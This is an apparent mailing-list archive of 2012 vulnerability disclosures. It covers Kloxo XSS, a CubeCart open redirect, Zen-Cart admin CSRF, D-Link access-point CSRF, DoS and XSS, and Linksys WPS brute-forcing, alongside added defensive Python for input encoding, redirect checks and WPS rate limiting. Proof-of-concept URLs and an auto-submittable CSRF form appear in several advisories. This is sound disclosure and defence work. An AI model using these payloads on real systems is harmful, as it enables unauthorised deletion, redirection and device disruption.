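                "http://adobe.com.attacker.example/"):
        print(f"{url:45} default={matches_default(url)!s:5} fixed={matches_fixed(url)}")
```

The anchored pattern requires `/` directly after the domain, which also rejects `http://adobe.com@attacker.example/` (userinfo trick); it does not allow an explicit port such as `adobe.com:443/`, which a deployment that needs it would have to add deliberately rather than by widening the character class again.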

Re: [Full-disclosure] Indianapolis Superbowl 2012 - SQL Injection Vulnerabilities

2012-02-10 Thread Julius Kivimäki
http://www.indianapolissuperbowl.com/view-release.php?id=42


Re: [Full-disclosure] Linksys Routers still Vulnerable to Wps vulnerability.

2012-02-10 Thread andrewn


Use Tomato-USB OS on them. 

A. 

On Fri, 10 Feb 2012 07:40:03 +0000, farthva...@hush.ai wrote:
 Don't buy Linksys routers, they are vulnerable to the Wifi unProtected
 Setup PIN registrar brute-force attack.
 No patch or workaround exists at the making of this post.

Vulnerable list and alleged
patch
availability:
source:http://www6.nohold.net/Cisco2/ukp.aspx?vw=1articleid=25154
[1]

 E1000 To Be Disclosed (aka we don't have idea)
 E1000 v2 To Be
Disclosed
 E1000 v2.1 To Be Disclosed
 E1200 v1 early March
 E1200 v2 early
March
 E1500 early March
 E1550 mid March
 E2000 To Be Disclosed
 E2100L
mid March
 E2500 early March
 E3000 To Be Disclosed 
 E3200 early March

E4200 v1 early March
 E4200 v2 To Be Disclosed
 M10 To Be Disclosed
 M20 To
Be Disclosed
 M20 v2 To Be Disclosed
 RE1000 early March
 WAG120N To Be
Disclosed
 WAG160N To Be Disclosed
 WAG160N v2 To Be Disclosed
 WAG310G To
Be Disclosed
 WAG320N To Be Disclosed
 WAG54G2 To Be Disclosed
 WAP610N To
Be Disclosed
 WRT110 To Be Disclosed
 WRT120N To Be Disclosed
 WRT160N v1
To Be Disclosed
 WRT160N v2 To Be Disclosed
 WRT160N v3 To Be Disclosed

WRT160NL To Be Disclosed
 WRT310N v1 To Be Disclosed
 WRT310N v2 To Be
Disclosed
 WRT320N To Be Disclosed
 WRT400N To Be Disclosed
 WRT54G2 v1 To
Be Disclosed
 WRT54G2 v1.3 To Be Disclosed
 WRT54G2 v1.5 To Be Disclosed

WRT54GS2 v1 To Be Disclosed
 WRT610N v1 To Be Disclosed
 WRT610N v2 To Be
Disclosed
 X2000 To Be Disclosed
 X2000 v2 To Be Disclosed
 X3000 To Be
Disclosed

The question is why a big company like Cisco/Linksys didn't
release a patch since almost 1 month and a half ?.

Well i have
circumstantial evidence that Cisco outsource some of their Linksys firmware
routers to other companies (Arcadyan for example.) in some cases source
code is only available through NDA's or not available at all. That's why
they are taking so long to release a fix to the WPS vulnerability. Fixing a
vulnerability like this with all the bureoucratic, QA and legal process
wouldn't take no more than 2 weeks. I found some GPL violations by the way
but this is beyond the scope of this message (obfuscating firmware it's
useless you now).

I apologize if i offended someone but IT security it's
serious business specially if someone use your wifi to commit crimes.
This
vulnerability contains public and very easy to use exploit code, it's not a
Denial of Service.

Farth Vader. 

 

Links:
--
[1]
http://www6.nohold.net/Cisco2/ukp.aspx?vw=1articleid=25154

[Full-disclosure] Linux Kloxo LxCenter Server CP v6.1.10 - Multiple Web Vulnerabilities

2012-02-10 Thread resea...@vulnerability-lab.com
Title:
==
Kloxo LxCenter Server CP v6.1.10 - Multiple Web Vulnerabilities


Date:
=
2012-02-10


References:
===
http://www.vulnerability-lab.com/get_content.php?id=429


VL-ID:
=
429


Introduction:
=
Scriptable, distributed and object oriented Hosting Platform. Manage
Clients, Resellers,
Domains, Backups, Stats, Mails and Databases. Manage everything!

(Copy of the Vendor Homepage: http://www.lxcenter.org/)


Abstract:
=
Vulnerability-Lab Team discovered multiple web vulnerabilities in
Kloxo's LxCenter Server CP v6.1.10.


Report-Timeline:
================
2012-02-10: Public or Non-Public Disclosure


Status:
=======
Unpublished


Exploitation-Technique:
===
Remote


Severity:
=
Medium


Details:
========
Multiple persistent input validation vulnerabilities are detected in
Kloxo's LxCenter Server CP v6.1.10.
The bug allows remote attackers to implement malicious script code on the
application side (persistent).
Successful exploitation of the vulnerability allows an attacker to
manipulate modules/context (persistent) & can
lead to session hijacking (user/mod/admin).


Vulnerable Module(s):
[+] LocalHost {Command Center}
[+] Server > Information > Verbose Settings


Picture(s):
../1.png
../2.png


Proof of Concept:
=
The vulnerabilities can be exploited by remote attackers with medium
required user interaction. For demonstration or to reproduce ...

1.1
Localhost {Command Center}

<script>global_need_list = new Array();</script>
<script>global_match_list = new Array();</script>
<script>global_desc_list = new Array();</script>
<form onsubmit="return check_for_needed_variables('command_centerlocalhost');"
      method="post" enctype="multipart/form-data" action="/display.php"
      id="command_centerlocalhost" name="command_centerlocalhost">
<fieldset style="background-color: rgb(255, 255, 255); border: 0px none; padding: 10px;" width="90%">
<legend style="font-weight: normal; border: 0px none;">
<font color="#303030" style="font-weight: bold;">Command Center for localhost</font>
</legend></fieldset>
<div align="left" style="background-color: rgb(255, 255, 255); width: 90%;">
<div align="left" style="width: 500px; border: 1px solid rgb(177, 192, 240);">
<input type="hidden" value="pserver" name="frm_o_o[0][class]"/>
<input type="hidden" value="localhost" name="frm_o_o[0][nname]"/>
<div align="left" style="padding: 10px; background-color: rgb(250, 248, 248); display: block;">Command <br/>
... or
<input width="60%" type="text" value=""
       name="frm_pserver_c_ccenter_command"
       class="frm_pserver_c_ccenter_command textbox"/>
<iframe size="30" "=" [PERSISTENT SCRIPT CODE INJECT!]" src="a">
</div><div align="left" style="padding:10 10 10 10 ;border-top:1px solid #aa; background-color:#ff;display:block">Output
<br><textarea nowrap id="textarea_" class="frmtextarea" rows="10"
 style="margin:0 0 0 50;width:85%;height:200px;" name="" size="30"></textarea>
<script type="text/javascript">createTextAreaWithLines('textarea_');</script>
<style>


1.2
Server > Information > 2 x Verbose Input

<font color="#303030" style="font-weight: bold;">Information for localhost</font></legend></fieldset>
<div align="left" style="background-color: rgb(255, 255, 255); width: 90%;">
<div align="left" style="width: 500px; border: 1px solid rgb(177, 192, 240);">
<input type="hidden" value="pserver" name="frm_o_o[0][class]"/>
<input type="hidden" value="localhost" name="frm_o_o[0][nname]"/>
<script>global_need_list['frm_pserver_c_description'] = 'Verbose Description (to Identify)';</script>
<div align="left" style="padding: 10px; background-color: rgb(250, 248, 248); display: block;">Verbose Description (to Identify)
<font color="red"><sup>*</sup></font><br/>
<input width="60%" type="text" [PERSISTENT SCRIPT CODE INJECT!]" iframe="" value=""
       name="frm_pserver_c_description" class="frm_pserver_c_description textbox"/>" size="30"></div>
<div align="left" style="padding: 10px; border-top: 1px solid rgb(170, 170, 170); background-color: rgb(255, 255, 255); display: block;">FQDN Hostname <br/>
<input width="60%" type="text" [PERSISTENT SCRIPT CODE INJECT!]" iframe="" value=""
       name="frm_pserver_c_realhostname" class="frm_pserver_c_realhostname textbox"/>" size="30"></div>
<div align="left" style="padding: 10px; border-top: 1px solid rgb(170, 170, 170); background-color: rgb(250, 248, 248); display: block;">Load Threshold At Which Warning Is Sent <br/>
<input width="60%" type="text" size="30" value="20"
       name="frm_pserver_c_load_threshold" class="frm_pserver_c_load_threshold textbox"/></div>
<input type="hidden" value="update" name="frm_action"/>
<input type="hidden" value="information" name="frm_subaction"/>


Reference(s):
../command-center.txt
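
The three injection points above are plain text fields (a verbose description, an FQDN hostname, a numeric load threshold) whose submitted value is stored and later written back into the admin page's markup without encoding, so a value containing a quote and an angle bracket terminates the attribute and the tag. The following Python is an added example, not Kloxo code and not part of the Vulnerability-Lab advisory; it shows the two server-side controls that close this class of bug: validate each field against what it is supposed to hold (a hostname must be a syntactically valid FQDN, a threshold must be an integer) and HTML-encode every stored value when it is rendered back into an attribute. The field names are the ones in the form above; the validation rules and the sample submission are assumptions made for illustration.

```python
import html
import re
from typing import Dict

# Field names as they appear in the Kloxo "Information for localhost" form.
# The validation rules below are assumptions about sane values, not Kloxo's own.
FQDN_LABEL = re.compile(r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)$")


def is_valid_fqdn(value: str) -> bool:
    """RFC 1123-style hostname check: dot-separated labels of letters, digits
    and hyphens, no label starting or ending with '-', total length <= 253."""
    if not value or len(value) > 253:
        return False
    labels = value.rstrip(".").split(".")
    return all(FQDN_LABEL.match(label) for label in labels)


def validate_information_form(fields: Dict[str, str]) -> dict:
    """Validate the three text inputs of the Server > Information form.

    Returns the cleaned values, or raises ValueError on the first bad field.
    The description is free text, so it is only length-limited here; the
    encoding step in render_text_input() is what keeps it harmless in markup.
    """
    cleaned = {}
    desc = fields.get("frm_pserver_c_description", "")
    if len(desc) > 128:
        raise ValueError("description too long")
    cleaned["frm_pserver_c_description"] = desc

    host = fields.get("frm_pserver_c_realhostname", "")
    if not is_valid_fqdn(host):
        raise ValueError("realhostname is not a valid FQDN")
    cleaned["frm_pserver_c_realhostname"] = host

    threshold = fields.get("frm_pserver_c_load_threshold", "")
    if not threshold.isdigit():
        raise ValueError("load_threshold must be a non-negative integer")
    cleaned["frm_pserver_c_load_threshold"] = int(threshold)
    return cleaned


def render_text_input(name: str, value) -> str:
    """Render a stored value back into an <input>, HTML-encoding it so that
    quotes and angle brackets cannot close the attribute or the tag."""
    safe = html.escape(str(value), quote=True)
    return f'<input type="text" name="{name}" value="{safe}"/>'


# Constructed sample submission: the description carries an attribute-breakout
# string of the kind the advisory marks as [PERSISTENT SCRIPT CODE INJECT!].
SAMPLE_POST = {
    "frm_pserver_c_description": '"><iframe src="a">',
    "frm_pserver_c_realhostname": "cp.example.net",
    "frm_pserver_c_load_threshold": "20",
}

if __name__ == "__main__":
    clean = validate_information_form(SAMPLE_POST)
    for field, value in clean.items():
        print(render_text_input(field, value))
```

Validation alone would not have saved the description field, which legitimately accepts arbitrary text; output encoding alone would have left the hostname field accepting anything. Both are needed, and the encoding must be applied at every place the stored value is echoed, not only on the form that collected it.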

Re: [Full-disclosure] Bug 718066 - [meta] Add feature to submit anonymous product metrics to Mozilla

2012-02-10 Thread Valdis . Kletnieks
On Fri, 10 Feb 2012 03:51:53 GMT, Nick Boyce said:
 OT: They should just make FF quality high and the design impeccable -

Quality high is always a nice concept.  But there's always 5 quality issues and
resources to fix only 3.  Obviously, you want to fix the 3 that matter most to
your users - but which 3 are they?  You really can't rely on bug reports or
surveys, because those tend to have a major self-selection bias.  Think about
it - how many people do you know that use Firefox?  How many of them have
had it crash or misbehave?  How many of them *reported* it?  Surveys have
the same problem - you can't easily run a survey of users who just want
to hit their sites and *do* stuff and find out what they want - because they'll
just skip your survey, hit their site, and *do* stuff.  Unless of course you make
the survey mandatory - in which case you tick them off because you got in
the way of hitting their site and doing stuff.

Or report the list of extensions and performance numbers - it's one thing to
know that users have a range of launch times.  It's something else to know that
20% of users have *consistently* longer launch times on comparable hardware.
But if you have data that shows that NoScript users take a 15% launch time hit,
*that* is something you can then go do something about.

Similar problems for impeccable design - if you want a browser that Joe Sixpack
will actually *use*, then you need data on how Joe actually wants to use that
browser.  And *asking* Joe never works - anybody who's had to do project
requirements will tell you that what the user *says* they want, what they *think*
they want, and what they actually need, are almost always 3 different things.

No, I'm not saying it's OK for the Mozilla crew to collect PII like that - but I can
certainly understand why they feel the temptation to do so...




Re: [Full-disclosure] Bug 718066 - [meta] Add feature to submit anonymous product metrics to Mozilla

2012-02-10 Thread Martijn Broos

Hi,

I can imagine that developers want to have a clue what they need to repair.
I only have a problem the way they do it and the way my behavior is exposed 
without possible influence.

Let's say for the sake of argument, that 20% on similar hardware have a problem 
with loading times and the developers have the metrics to prove so (waiting 
times, load times, scripts I use,  etc...)
Would the conclusion be, that Firefox is at fault?
- What if the major part of that % is living in a certain continent?
- What if the major % has the same ISP?
- How is the spread of OS usage?
- etc, etc

Without the surrounding parameters known, you have a pile of bytes instead of 
DATA (people tend to mix those definitions). Of course you could make fuzzy 
statistics out of it, but like most mathematicians know: statistics prove 
predetermined conclusions.

Still would a 5% speed increase weigh up to the privacy of 200 million users?
Like in the bugtrack stated. If my instance of firefox is PII bound, you can 
trace my laptop, determine behavior, etc...
And to conclude: Modzilla states they don't intend to use the data in any other 
way:
I have a couple of  questions about the intent:
- Will that intent stay the same throughout the future? The intent can easily 
be changed when money gets involved.
- What if a legal entity (like a government, The Music branch protectors(to 
prove that the piratebay is used so often), etc...) kindly requests the data 
with a court-order?

Also take into account the following:
Since 2012, the Netherlands has a new law which forbids behavior analysis by 
persistent cookies...All advertisement companies are now looking into device 
identification.
Why: they can make more money when they show you the right ads.
Modzilla will help them a great deal if they can offer them a PII out of 
stock... And I see the comments, they won't do that! Do you want to bet 1 
million bugs over it that they won't do it?

-Original Message-
From: full-disclosure-boun...@lists.grok.org.uk 
[mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of 
valdis.kletni...@vt.edu
Sent: vrijdag 10 februari 2012 15:48
To: Nick Boyce
Cc: full-disclosure
Subject: Re: [Full-disclosure] Bug 718066 - [meta] Add feature to submit 
anonymous product metrics to Mozilla

On Fri, 10 Feb 2012 03:51:53 GMT, Nick Boyce said:
 OT: They should just make FF quality high and the design impeccable -

Quality high is always a nice concept.  But there's always 5 quality issues 
and resources to fix only 3.  Obviously, you want to fix the 3 that matter most 
to your users - but which 3 are they?  You really can't rely on bug reports or 
surveys, because those tend to have a major self-selection bias.  Think about 
it - how many people do you know that use Firefox?  How many of them have had 
it crash or misbehave?  How many of them *reported* it?  Surveys have the same 
problem - you can't easily run a survey of users who just want to hit their 
sites and *do* stuff and find out what they want - because they'll just skip 
your survey, hit their site, and *do* stuff.  Unless of course you make the 
survey mandatory - in which case you tick them off because you got in the way 
of hitting their site and doing stuff.

Or report the list of extensions and performance numbers -  it's one thing to 
know that users have a range of launch times.  It's something else to know that 
20% of users have *consistently* longer launch times on comparable hardware.
But if you have data that shows that NoScript users take a 15% launch time hit,
*that* is something you can then go do something about.

Similar problems for impeccable design - if you want a browser that Joe 
Sixpack will actually *use*, then you need data on how Joe actually wants to 
use that browser.  And *asking* Joe never works - anybody who's had to do 
project requirements will tell you that what the user *says* they want, what 
they *think* they want, and what they actually need, are almost always 3 
different things.

No, I'm not saying it's OK for the Mozilla crew to collect PII like that - but 
I can certainly understand why they feel the temptation to do so...



DISCLAIMER : This message is sent in confidence and is only intended for the 
named recipient. If you receive this message by mistake, you may not use, copy, 
distribute or forward this message, or any part of its contents or rely upon 
the information contained in it.
Please notify the sender immediately by e-mail and delete the relevant e-mails 
from any computer.



Re: [Full-disclosure] Linksys Routers still Vulnerable to Wps vulnerability.

2012-02-10 Thread Valdis . Kletnieks
On Fri, 10 Feb 2012 07:40:03 GMT, farthva...@hush.ai said:

 Don't buy Linksys Routers they are vulnerable to Wifi unProtected
 Setup Pin registrar Brute force attack.

Nice sound bite there.

So tell us - what alternative brand should we buy instead? Include in your
discussion a proof that the alternative doesn't have other, even worse,
security issues.



[Full-disclosure] CubeCart 3.0.20 (3.0.x) and lower | Open URL Redirection Vulnerability

2012-02-10 Thread YGN Ethical Hacker Group
1. OVERVIEW

The CubeCart 3.0.20 and lower versions are vulnerable to Open URL Redirection.


2. BACKGROUND

CubeCart is an out of the box ecommerce shopping cart software
solution which has been written to run on servers that have PHP &
MySQL support. With CubeCart you can quickly set up a powerful online
store which can be used to sell digital or tangible products to new
and existing customers all over the world.


3. VULNERABILITY DESCRIPTION

The CubeCart 3.0.20 and lower versions contain a flaw that allows a
remote cross site redirection attack. This flaw exists because the
application does not properly sanitise the parameters goto and r.
This allows an attacker to create a specially crafted URL that, if
clicked, would redirect a victim from the intended legitimate web site
(domain.com) to an arbitrary web site (localhost) of the attacker's
choice.


4. VERSIONS AFFECTED

3.0.20 and lower (aka 3.0.x family)


5. PROOF-OF-CONCEPT/EXPLOIT

http://localhost/cube3.0.20/switch.php?r=//yehg.net/&lang=es
http://localhost/cube3.0.20/admin/login.php?goto=//yehg.net


6. SOLUTION

The CubeCart 3.0.x version family is no longer maintained by the vendor.
Upgrade to CubeCart 4x/5.x.


7. VENDOR

CubeCart Development Team
http://cubecart.com/


8. CREDIT

Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2012-02-10: CubeCart 3.0.x in End-of-Support/Maintenance circle
2012-02-10: Vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/[cubecart_3.0.20_3.0.x]_open_url_redirection
CubeCart Home Page: http://cubecart.com/
OWASP Top 10 2010 - A 10:
http://www.owasp.org/index.php/Top_10_2010-A10-Unvalidated_Redirects_and_Forwards
SANS Top 25: http://cwe.mitre.org/top25/#CWE-601
CWE-601: http://cwe.mitre.org/data/definitions/601.html

#yehg [2012-02-10]
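
Both PoC URLs use a scheme-relative target (`//yehg.net`): a redirect check that only looks for `http://` or `https://` at the start of the `goto` or `r` value lets such a value through, and the browser resolves it against the current scheme to an external host. The Python below is an added example and not CubeCart's code; it shows a `safe_redirect_target()` check that accepts only a same-site relative path and falls back to a fixed default for everything else, including the scheme-relative, absolute, backslash and CR/LF forms that commonly slip past naive prefix checks. The parameter names come from the advisory; the fallback path and the `redirect_from_params()` dispatcher are assumptions standing in for switch.php and admin/login.php.

```python
from urllib.parse import urlsplit, urlunsplit

DEFAULT_TARGET = "/index.php"   # assumed fallback; CubeCart's own default is not on the page


def safe_redirect_target(value: str, default: str = DEFAULT_TARGET) -> str:
    """Return `value` only if it is a same-site relative path, else `default`.

    Rejected forms:
      //host/...        scheme-relative (the form used in the CubeCart PoC)
      http://host/...   absolute URL (any scheme, including javascript:)
      /\\host/...       backslash variants that browsers normalise to '//'
      anything with CR, LF, TAB or NUL (Location header injection)
      anything not beginning with exactly one '/'
    """
    if not value:
        return default
    # Reject control characters and backslashes before any parsing: browsers and
    # proxies disagree on how to normalise them, which is exactly what attackers use.
    if any(ch in value for ch in "\\\r\n\t\x00") or value != value.strip():
        return default
    if not value.startswith("/") or value.startswith("//"):
        return default
    parts = urlsplit(value)
    # A same-site path has neither a scheme nor a network location.
    if parts.scheme or parts.netloc:
        return default
    # Rebuild from the parsed components so only path, query and fragment survive.
    return urlunsplit(("", "", parts.path, parts.query, parts.fragment))


def redirect_from_params(params: dict) -> str:
    """Stand-in for switch.php / admin/login.php: honour `goto` or `r` only
    after it has passed safe_redirect_target()."""
    raw = params.get("goto") or params.get("r") or ""
    return safe_redirect_target(raw)


if __name__ == "__main__":
    # Constructed inputs: the two PoC values from the advisory and a legitimate one.
    for candidate in ("//yehg.net/", "//yehg.net", "/admin/index.php?lang=es"):
        print(f"{candidate!r:32} -> {safe_redirect_target(candidate)}")
```

An allow-list of relative paths is the simplest correct policy for a shop or admin login; if off-site redirects are a genuine requirement, compare the parsed host against an explicit list of permitted hosts rather than trying to enumerate bad prefixes.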



[Full-disclosure] Zen-Cart Admin CSRF/XSRF - Delete / Disable Products | UPS-2011-0018 | CVE-2011-4403

2012-02-10 Thread upsploit advisories
*Advisory Information*

Title: Zen-Cart Admin CSRF/XSRF - Delete / Disable Products
Date published: 2012-02-10 01:59:45 AM
upSploit Ref: UPS-2011-0018

CVE REF: CVE-2011-4403

*Advisory Summary*

An attacker can force an administrator to delete or disable products from
within his store.

*Vendor*

Zen-Cart

*Affected Software*

Zen-Cart v1.3.9h

Zen Cart™ truly is the art of e-commerce; free, user-friendly, open source
shopping cart software. The ecommerce web site design program is being
developed by a group of like-minded shop owners, programmers, designers,
and consultants that think ecommerce web design could be and should be done
differently.

*Description of Issue*

This is a POC for CSRF on Zen-cart 1.3.9h admin control panel. By
submitting this form from any location an attacker can cause the
administrator to delete / disable products from his store.

*PoC*

Requirements

1. Admin user (target) must have a valid session id. Even if they have
closed the admin window, this attack is still successful
2. The attacker must obtain the admin url
  * Social Engineer an admin user (trick them)
  * Packet Capture
  * Email headers
  * Invoice print out
  * * I know these have been addressed in your security forum topics,
but most users are not aware of these issues
3. The attacker must obtain the product id
  * This is public information
4. The attacker must then social engineer the admin (trick them) into loading the page
  * Email with images
  * Post a forum topic with the images
  * Link them to a page on the attacker’s server

Proof of Concept

Delete:

This form can be hidden and made to submit automatically on page load:

<form name="products" action="http://www.mysite.com/path_to_admin/product.php?action=delete_product_confirm" method="post">
<label for="securityToken">Security Token</label><br/><input type="text" name="securityToken" value="Can be anything…"/><br/><br/>
<label for="products_id">Products ID</label><br/><input type="text" name="products_id" value="329"><br/><br/>
<label for="product_categories[]">Products Category</label><br/><input type="text" value="48" name="product_categories[]"><br/><br/>
<input type="submit" border="0" alt="Delete" value=" Delete Product">
</form>

Disable:

<img src="http://www.mysite.com/path_to_admin/categories.php?action=setflag&flag=0&pID=1"/>
<img src="http://www.mysite.com/path_to_admin/categories.php?action=setflag&flag=0&pID=2"/>
<img src="http://www.mysite.com/path_to_admin/categories.php?action=setflag&flag=0&pID=3"/>
<img src="http://www.mysite.com/path_to_admin/categories.php?action=setflag&flag=0&pID=4"/>
<img src="http://www.mysite.com/path_to_admin/categories.php?action=setflag&flag=0&pID=5"/>

Proposed Solution

* Add the security token conditional statement to the
delete_product_confirm.php for all product types
* This should be applied to all requests made within the admin control
panel rather than just key operations

*Credits*

DisK0nn3cT

*References*

http://www.zen-cart.com/
http://www.owasp.org/index.php/Testing_for_CSRF_(OWASP-SM-005)

*Patch/Fix*

Update to the latest version

Re: [Full-disclosure] Linksys Routers still Vulnerable to Wps vulnerability.

2012-02-10 Thread Dan Kaminsky
Fixing a vulnerability like this with all the bureaucratic, QA and legal 
process wouldn't take no more than 2 weeks

If bureaucratic, QA, and legal issues emerge, you can't even get the names of 
the people you need to speak to in less than 2 weeks, let alone schedule a 
conference call. Fixing?  Heh.  

Aside from rate limiting WPS, there isn't much of a fix, and you can't turn it 
off either.

Sent from my iPhone

On Feb 10, 2012, at 2:40 AM, farthva...@hush.ai wrote:

 Don't buy Linksys Routers they are vulnerable to Wifi unProtected Setup Pin 
 registrar Brute force attack.
 No patch or workaround exist at the making of this post.
 
 Vulnerable list and alleged patch availability:
 source:http://www6.nohold.net/Cisco2/ukp.aspx?vw=1articleid=25154
 
  E1000  To Be Disclosed (aka we don't have idea)
  E1000 v2  To Be Disclosed
  E1000 v2.1  To Be Disclosed
  E1200 v1 early March
  E1200 v2 early March
  E1500 early March
  E1550 mid March
  E2000 To Be Disclosed
  E2100L mid March
  E2500 early March
  E3000 To Be Disclosed 
  E3200 early March
  E4200 v1 early March
  E4200 v2 To Be Disclosed
  M10 To Be Disclosed
  M20 To Be Disclosed
  M20 v2 To Be Disclosed
  RE1000 early March
  WAG120N To Be Disclosed
  WAG160N To Be Disclosed
  WAG160N v2 To Be Disclosed
  WAG310G To Be Disclosed
  WAG320N To Be Disclosed
  WAG54G2 To Be Disclosed
  WAP610N To Be Disclosed
  WRT110 To Be Disclosed
  WRT120N To Be Disclosed
  WRT160N v1 To Be Disclosed
  WRT160N v2 To Be Disclosed
  WRT160N v3 To Be Disclosed
  WRT160NL To Be Disclosed
  WRT310N v1 To Be Disclosed
  WRT310N v2 To Be Disclosed
  WRT320N To Be Disclosed
  WRT400N To Be Disclosed
  WRT54G2 v1 To Be Disclosed
  WRT54G2 v1.3 To Be Disclosed
  WRT54G2 v1.5 To Be Disclosed
  WRT54GS2 v1 To Be Disclosed
  WRT610N v1 To Be Disclosed
  WRT610N v2 To Be Disclosed
  X2000 To Be Disclosed
  X2000 v2 To Be Disclosed
  X3000 To Be Disclosed
 
 The question is why a big company like Cisco/Linksys didn't release a patch 
 since almost 1 month and a half ?.
 
 Well i have circumstantial evidence that Cisco outsource some of their 
 Linksys firmware routers to other companies (Arcadyan for example.) in some 
 cases source code is only available through NDA's or not available at all. 
 That's why they are taking so long to release a fix to the WPS vulnerability. 
 Fixing a vulnerability like this with all the bureaucratic, QA and legal 
 process wouldn't take no more than 2 weeks. I found some GPL violations by 
 the way but this is beyond the scope of this message (obfuscating firmware 
 it's useless you know).
 
 I apologize if i offended someone but IT security it's serious business 
 specially if someone use your wifi to commit crimes.
 This vulnerability contains public and very easy to use exploit code, it's 
 not a Denial of Service.
 
 
 Farth Vader.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
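
The one mitigation this thread names is rate limiting the WPS registrar. The Python below is an added example, not Linksys, DD-WRT or Tomato code, of what an access point's registrar side has to track for that to mean anything: failed PIN exchanges per enrollee MAC address within a sliding window, a lockout once a small number of them accumulate, a penalty that grows with each repeated lockout so the attacker cannot simply wait out a fixed pause, and a separate aggregate cap so that rotating the source MAC does not reset the budget. The thresholds and window lengths are assumptions chosen for illustration, and the timestamps in the usage are constructed.

```python
from collections import defaultdict, deque


class WpsRegistrarThrottle:
    """Decide whether the registrar may run another PIN exchange.

    Policy (assumed for illustration, not any vendor's):
      * `max_failures` failures from one MAC inside `window` seconds lock that
        MAC out for `base_lockout` seconds; each further lockout doubles the
        penalty, capped at `max_lockout`.
      * `global_max_failures` failures from any MACs inside `window` seconds
        lock the registrar for everyone for `base_lockout` seconds.
    """

    def __init__(self, max_failures=3, window=60.0, base_lockout=60.0,
                 max_lockout=3600.0, global_max_failures=10):
        self.max_failures = max_failures
        self.window = window
        self.base_lockout = base_lockout
        self.max_lockout = max_lockout
        self.global_max_failures = global_max_failures
        self._failures = defaultdict(deque)   # mac -> timestamps of recent failures
        self._global_failures = deque()       # timestamps of all recent failures
        self._locked_until = {}               # mac -> time its lockout expires
        self._lockouts = defaultdict(int)     # mac -> lockouts so far (for backoff)
        self._global_locked_until = 0.0

    def _prune(self, timestamps: deque, now: float) -> None:
        """Drop failures that have aged out of the sliding window."""
        while timestamps and now - timestamps[0] > self.window:
            timestamps.popleft()

    def may_attempt(self, mac: str, now: float) -> bool:
        """True if a PIN exchange for `mac` may proceed at time `now`."""
        if now < self._global_locked_until:
            return False
        return now >= self._locked_until.get(mac, 0.0)

    def record_failure(self, mac: str, now: float) -> None:
        """Register a failed PIN exchange and apply any lockout it triggers."""
        per_mac = self._failures[mac]
        self._prune(per_mac, now)
        self._prune(self._global_failures, now)
        per_mac.append(now)
        self._global_failures.append(now)

        if len(per_mac) >= self.max_failures:
            self._lockouts[mac] += 1
            penalty = min(self.base_lockout * 2 ** (self._lockouts[mac] - 1),
                          self.max_lockout)
            self._locked_until[mac] = now + penalty
            per_mac.clear()

        if len(self._global_failures) >= self.global_max_failures:
            # Too many failures across all enrollees: lock the registrar entirely.
            self._global_locked_until = now + self.base_lockout
            self._global_failures.clear()

    def record_success(self, mac: str) -> None:
        """A completed enrolment clears that client's failure history."""
        self._failures.pop(mac, None)
        self._locked_until.pop(mac, None)
        self._lockouts.pop(mac, None)


if __name__ == "__main__":
    # Constructed timeline: one enrollee fails three times in a row.
    throttle = WpsRegistrarThrottle()
    mac = "aa:bb:cc:dd:ee:01"
    for t in (0.0, 1.0, 2.0):
        throttle.record_failure(mac, t)
    print("attempt at t=10s allowed:", throttle.may_attempt(mac, 10.0))
    print("attempt at t=70s allowed:", throttle.may_attempt(mac, 70.0))
```

Whatever the exact numbers, the property that matters is that the attacker's cost per guess grows faster than the attacker's patience: a fixed, short, per-MAC lockout on its own is the version that Reaver-style tooling was built to wait out.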

[Full-disclosure] Multiple CSRF, DoS and XSS vulnerabilities in D-Link DAP 1150

2012-02-10 Thread MustLive
Hello list!

I want to warn you about new security vulnerabilities in D-Link DAP 1150 
(Wi-Fi Access Point and Router).

These are Cross-Site Request Forgery, Denial of Service and Cross-Site 
Scripting vulnerabilities. This is my fourth advisory from series of 
advisories about vulnerabilities in D-Link products.

SecurityVulns ID: 12076.

These vulnerabilities are in device admin panel in Access Point mode. In 
Router mode there are many new sections appear in admin panel which are 
vulnerable to CSRF and XSS.

-
Affected products:
-

The following model is vulnerable: D-Link DAP 1150, Firmware version 1.2.94. This
model with other firmware versions must also be vulnerable.

D-Link decided not to fix these vulnerabilities, the same as they still
haven't fixed many vulnerabilities in DSL-500T (from 2005).

--
Details:
--

CSRF (WASC-09):

http://192.168.0.50/index.cgi?res_cmd=20&res_buf=null&res_cmd_type=bl&v2=y&rq=y

Via CSRF it's possible to save configuration. It's needed for saving 
settings after restarting of the device. Also via CSRF it's possible to do 
operations Reboot, SaveReboot and Logout.

DoS (WASC-10):

Remote restarting of the device:

http://192.168.0.50/index.cgi?res_cmd=6&res_buf=null&res_cmd_type=nbl&v2=y&rq=y

CSRF (WASC-09):

In section Net / Connections via CSRF it's possible to add connections (such 
types as PPPoE, IPoE, L2TP, PPTP), to remove connections and to change 
settings of existent connections.

XSS (persistent) (WASC-08):

In section Net / Connections at adding or editing of connections it's 
possible to set XSS code in subsection Main in field Name. The code will 
execute at page Connections.

In section Net / Connections at adding or editing of connections it's 
possible to set XSS code in subsection Static DHCP in field Host name. The 
code will execute at page Main in connection's properties.

CSRF (WASC-09):

In section Wi-Fi in subsections Security settings, WPS via CSRF it's 
possible to change security settings.

In section Wi-Fi in subsections Basic settings, MAC-Filter (Filter mode, 
MAC-addresses), Station List, WDS, Additional settings, WMM, Client, in 
section Advanced / Device mode, in section System in subsections System log, 
NTP client via CSRF it's possible to change settings.


Timeline:


2011.11.17 - found vulnerabilities.
2011.12.13 - announced at my site.
2011.12.16 - informed developers.
2012.02.09 - disclosed at my site.

I mentioned about these vulnerabilities at my site 
(http://websecurity.com.ua/5567/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua 
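
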